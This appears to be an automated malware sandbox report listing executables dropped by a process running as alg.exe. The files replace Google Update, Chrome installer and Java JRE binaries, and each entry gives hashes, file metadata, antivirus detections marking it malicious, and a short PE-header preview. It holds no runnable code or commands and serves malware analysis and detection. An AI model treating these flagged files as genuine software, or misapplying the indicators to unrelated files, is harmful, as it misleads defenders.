                                                                                                                                                SHA-512:3CF4C9E28D17487FA3D528FD913FA5A995E61F1E7C25E5266E5724FA5BDC8294C480027DE299DCE0300705F64B886EE2B32EB54CE55207DBD183973F96B2B279
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.................................K...........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1419264
                                                                                                                                                Entropy (8bit):5.46672429691328
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:QlnRklQ6fgJcEwixVsqjnhMgeiCl7G0nehbGZpbD:0oRfgJcEwCJDmg27RnWGj
                                                                                                                                                MD5:C2EC50802AC3131E630A4E250BFED447
                                                                                                                                                SHA1:095CA833431BC7472EF8FFEA6526D8F87B4D6F4F
                                                                                                                                                SHA-256:46012FD8BC885A7E9D503E3B7C29611CFC0FFDC9B74B6EC9CEB15A8F11D6499F
                                                                                                                                                SHA-512:CFF99475C2C09B499B7B75AB26C4A235865BAD233B72538047DEA731455D318C4D85FC9C3691935FEE514F15BB9D48CB3909EB1207B65C275A6D323CDD6CD528
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@..................................b......................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...p.......`...H..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1522176
                                                                                                                                                Entropy (8bit):5.496541844786697
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:TW25k8hb0Haw+xlsqjnhMgeiCl7G0nehbGZpbD:TWyk8SHawmZDmg27RnWGj
                                                                                                                                                MD5:325EF02462CA82C2FB20F6E9423E343C
                                                                                                                                                SHA1:B21BF2CBE8935C387EB46CC561ED3DE4AEDC2E4C
                                                                                                                                                SHA-256:5023DABF517343442E850A9FE4960709B7530E088E024F1B118F37966EAFE495
                                                                                                                                                SHA-512:5B7B850F6CACBE34FDF6F5103C404BDF30810E907AB2F77014EDFA439355E28355BE56D9B14D17349CE144F2AC9776B2A9AE488CCA50B1DC599875C6963BA02A
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@....................................N..... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1282048
                                                                                                                                                Entropy (8bit):5.163952327522426
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:BWP/aK2vB+WXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:BKCKAB9sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:B3FF30650864C1CE951670AE931251D4
                                                                                                                                                SHA1:0C1B1CAFDF386B7B9BD85EF00BF3F949CD8AD710
                                                                                                                                                SHA-256:ACF4A752B0736FB013928F9B0390BCC478061119C87318EB4200A0BAEC7B89D5
                                                                                                                                                SHA-512:B240A689CD4C002FE075FCF979D758ED6666D28D2B74EEA9EEAFEB718AD6D9C2E5EC307015E459BAC2D88C912D72FC275EEC223492820C46565615CB41AFF135
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@.........................................................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1228288
                                                                                                                                                Entropy (8bit):5.16203046659004
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:lO7cCNWB+094Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:kjNWBPGsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:05E76F365B8052403C9F677AC404BB2B
                                                                                                                                                SHA1:136175D675A59BCE62927AA955EF0BF7108FBC59
                                                                                                                                                SHA-256:D854643153871BCE9831A8924799A9A40068FB3B4923A1465B789CA247EA85BF
                                                                                                                                                SHA-512:901DD96819AE400A595577DEC4C6B4C02815DA0C6C0F71CC9199CF66821522B3BC38C7599762445C8EB9C3EFA07ED66298A202CB8BEC1122A04E9AAD80C9B919
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@..........................................................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1302528
                                                                                                                                                Entropy (8bit):5.2389229788424165
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:+ihRyhdsRrEsqjnhMgeiCl7G0nehbGZpbD:+ihsoRgDmg27RnWGj
                                                                                                                                                MD5:8C97EE65409B53591F113BF785503CBF
                                                                                                                                                SHA1:60C0113223B45B110E4976762F16DA50B4DA6F08
                                                                                                                                                SHA-256:141590DEAE627459A66D478C1F07FCB2AB3649A6577ED5DFD994E9880D0A42BF
                                                                                                                                                SHA-512:D170A828E3C40B39206DB1360B24DD476D1A27F506227A59466D2784FDD20382E1749F1E9B53028A1F58A9F4FAD2FFE84048D08C1B04092FA220786C93F765B9
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p.......|.... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1342464
                                                                                                                                                Entropy (8bit):5.3510138995375
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:R1FDmRF+wpx/Qaf7sqjnhMgeiCl7G0nehbGZpbD:hmRF+wn/JfvDmg27RnWGj
                                                                                                                                                MD5:F900E0307CE1FE1BDF71E59119246AEA
                                                                                                                                                SHA1:64AB20EDFB85738A1FF1B8E1E0C98D86F3AFDBA7
                                                                                                                                                SHA-256:47CE1C2F613ABE251F727728941558E233F3A142623E6E90BAB2CFEE974F2AF0
                                                                                                                                                SHA-512:11932B0C349D0D260709E91C22D5B64DB5F41E44E63BC53BFD0C3162FF29333894799CC055B45860D31F0D9BE0A0DE212D9854679E8A1C9B098152D86732A49F
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@..................................................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1228288
                                                                                                                                                Entropy (8bit):5.161995297299323
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:L2Ae621B+0YKXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:qE21BPZsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:E05799650B3D363DAB052D1E1C67D842
                                                                                                                                                SHA1:0BDE2BE10384D0E7D9D9E11A883FC19F3021ADCE
                                                                                                                                                SHA-256:35435ED09C0ABF50C7D76F20949D517193C597FD90981BF081C8A835094CD7C1
                                                                                                                                                SHA-512:D975165B77BF46FD45D98433BCBC6E8127C135247D33F0658BB76F5E4C9769A94618140402B0F9FBB7F16C431D2672DA2F52203704D8CFFABFC4A8543FAC2472
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@.................................QX.......................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):105669632
                                                                                                                                                Entropy (8bit):7.999989849484188
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:3145728:jLAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:nBWx/pt8U7E6aZRfIICU
                                                                                                                                                MD5:3C5B57BA1207B7E62067D13AA49C46B9
                                                                                                                                                SHA1:276B6CB7B6D7AFD294AF66F2376052112E58BD48
                                                                                                                                                SHA-256:ED9B0E6D06FB4F1BDEEDFA663994D770142575F711154874CAB9C41D2F3E1121
                                                                                                                                                SHA-512:4B6F7B8C02BA17354CEC09BBF1B209F737E6FAA0FE7FC750188D8FD4C8AB9E18D7983D09F834B3A5C2DF84938C9E579310C0B9A7DFC1E28CD56713021CEB9A33
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4...LC................@..............................L.......L... ..................................................X..P........+C.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc....+C......,C..X..............@..@.reloc........C.......C.............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1158144
                                                                                                                                                Entropy (8bit):5.0680906763861255
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:y9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:y9sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:66F5B16FDC026AA28620763D069C5B50
                                                                                                                                                SHA1:52DC61F516C4B44CD1BBE22D86B89DFC39C3C372
                                                                                                                                                SHA-256:03D9A9E63576192B124C1688D8A5215D50336781641582A2DF4D9F12483AC33E
                                                                                                                                                SHA-512:DC79A0AFB90631629562D1F565EF7023FB79848448B82CC0C494F4AB0B4539626646434FF8D6B6B0B720BA0494108335682193E138AF808DDA3E606419547044
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.................................>.......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...P.......@...l..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1142272
                                                                                                                                                Entropy (8bit):5.0324130690867666
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:YK2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:l2sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:01F45D9CB360821BF19D9473E1EE9E7F
                                                                                                                                                SHA1:608E14CC2F6D01B16128DAC2C444556E4D266500
                                                                                                                                                SHA-256:1D7F6C46C9A5121B654BFD06017BF472FA9725A2D64D81F569E43B0E5D31BF61
                                                                                                                                                SHA-512:07073803076110DD774E3C4567C468E04C349DE3964A22479867652853603C638DA99CDCC90DABAED1DF21D513608EFF0125E4EBF1D18116D0FB670FCB31CB72
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................a........................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1375232
                                                                                                                                                Entropy (8bit):5.446077565494783
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:mnEbH0j4x7R6SvyCMzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:mkwOtO7zsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:771419DA92024B43EFA488F4BCAF9107
                                                                                                                                                SHA1:083A46C21090F65B7B8039447395D0F428EC5E5B
                                                                                                                                                SHA-256:451B245EA03A35206202D28EC09439E57EA7E14AA0AA4491229BD32BCD5F5861
                                                                                                                                                SHA-512:E0739F12ADE3EBA12578BED1853367998C632A43EC92A5A48A8E8601E33AECD1F19207E7F68527C6F349E810C67B7974335F30ED53C296BEFAC3981D0547F474
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@...............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1212416
                                                                                                                                                Entropy (8bit):5.119733771190659
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:tv1vvSXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:p1ysqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:8050EE33966C55A2A3ECF0817E65A270
                                                                                                                                                SHA1:20C14D64D60C2AE51FE16C2F8ACCBE182247FD9A
                                                                                                                                                SHA-256:E8E40C4A2696AE2FC5A8DA6F1C8C836998D53615049E5617D86AFBE349CB6C2F
                                                                                                                                                SHA-512:E65CAACC511C842AB2AD45DFAE433AA6DC183820A014FE2190B83D985C2DA5D12459B92355475E08B092936A248CB63C30061813EE81966D701FE070D7A86804
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@..................................r......................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1375232
                                                                                                                                                Entropy (8bit):5.446825237836686
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:onU/h/4KIsqjnhMgeiCl7G0nehbGZpbD:oU/V0Dmg27RnWGj
                                                                                                                                                MD5:3B936DAABC0CCDF51D873BA2DDCA2310
                                                                                                                                                SHA1:CA347501E2157F7C0245EDEA48D8E53796DE9D10
                                                                                                                                                SHA-256:0154FB6F6FE6509C6F748D955ABB2A8487D242762357BF7217551C52012A610F
                                                                                                                                                SHA-512:271A6E54B3D2FA4D4FA94AF65752168535E027FBBDC2CDEC6BE09865BFAC364872FDCA10DBF77A6F4825679F6641D7E176C0BF6436695F7A9BD3A59E4D369325
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@...............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1513984
                                                                                                                                                Entropy (8bit):5.48374489476901
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:vx71iBLZ05jNTmJWExXsqjnhMgeiCl7G0nehbGZpbD:vxhiHIjNgrDmg27RnWGj
                                                                                                                                                MD5:C80420C2C6B8D08B234266BDF618FF8E
                                                                                                                                                SHA1:E365B0E65AA125B02B66AC8A05A225552664E8D6
                                                                                                                                                SHA-256:93506DF0F93242397CE47C7247B904EFFE0E9D9E5549753C111222B271058067
                                                                                                                                                SHA-512:A6C1608AF3E72FEAF0C2C2203583B6A661DC11C48B3C6F6A81D1DB804DCA8F2B05138D7E6CEAF7003D0BBE18EEEA49A566CB73551995C1FB842C4EE4307FAADF
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.............................................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1142272
                                                                                                                                                Entropy (8bit):5.032897068091881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:v3rmXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:PysqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:CE48C36A1E01BC982A327E2E3C605FBD
                                                                                                                                                SHA1:A08E83CF357EEAE386ACFA75817C5A8F57357D01
                                                                                                                                                SHA-256:0F3DA0A4CD67761539DF52C8EA74730170A1F7FA83EA0171957FC381D7CBCDD7
                                                                                                                                                SHA-512:DAC230239B8FA080B7BBAA207BF5F79ADB7054A759342CCDA2EF5FA43D21BAF35354718319826826E86FFCBFFF6486E37B66DA0C33BB71C6DE9A272DF57F9E0E
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................)n.......................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1242112
                                                                                                                                                Entropy (8bit):5.172681387297573
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:SYdP/xXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zdP/xsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:062489F464DCC3E2F661721927B939EB
                                                                                                                                                SHA1:B4449CA9A4EB025A3700E9E20552F6622C36F10C
                                                                                                                                                SHA-256:B55EED75015EEEAD987FA23A54606C3A0C32C0915774E7889864B5CF74D8FEDE
                                                                                                                                                SHA-512:DF946DEAA9DC347F4748FEC19F8DA2E69232B2577D812CD9CC471053A6598EF4BDEA92A2626B6B22C7E23C533F28EF3096ABEDD499FB70AA02B4444379177CC7
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................P..................................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1142272
                                                                                                                                                Entropy (8bit):5.032913903151245
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:2y5uXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:rosqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:BB43E319BF9789B70488310FF13DB112
                                                                                                                                                SHA1:9739108105F388E84BF19BED9E00B0CC36987BB0
                                                                                                                                                SHA-256:6A55502C7A99C88EA5E758EA9FC4A05D052BAA176C21FADF8A396D0C0BA88C9E
                                                                                                                                                SHA-512:B01387D68BE6F3B38A37868003362E10AB0AFE9AE880CD0F4056CEA2AD613FBF4C430B793957AE208D6CC559326AB2E0E46A5A62EF2E848028253A2B26CEC45F
                                                                                                                                                Malicious:true
